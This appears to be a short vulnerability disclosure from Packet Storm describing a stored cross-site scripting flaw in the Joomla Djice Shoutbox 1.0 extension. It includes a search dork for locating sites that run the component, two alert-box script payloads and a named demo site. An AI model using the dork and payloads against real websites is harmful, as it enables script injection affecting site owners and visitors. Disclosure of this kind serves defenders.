Joomla Djice Shoutbox version 1.0 suffers from a permanent cross site scripting vulnerability.
ab0983764c6ae2589c7647ff07614d3c2113d33e06c2b3f5ed24b6f240991231############################################
# Joomla Djice Shoutbox v 1.0 <= Permanent XSS vulnerability #
############################################
- dork: inurl:"index.php?option=com_djiceshoutbox"
The script is affected by Permanent XSS vulnerability, so yuo can put in bad java script code like:
"><script>alert('XaDoS')</script>
or
'">><script>alert('XSS By XaDoS')</script>
the XSS become permanent in every page of site!
not critical damage but it's not funny..
[+] D3M0:
http://www.djiceatwork.com
contact me at xados @ hotmail . it
www.securitycode.it
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed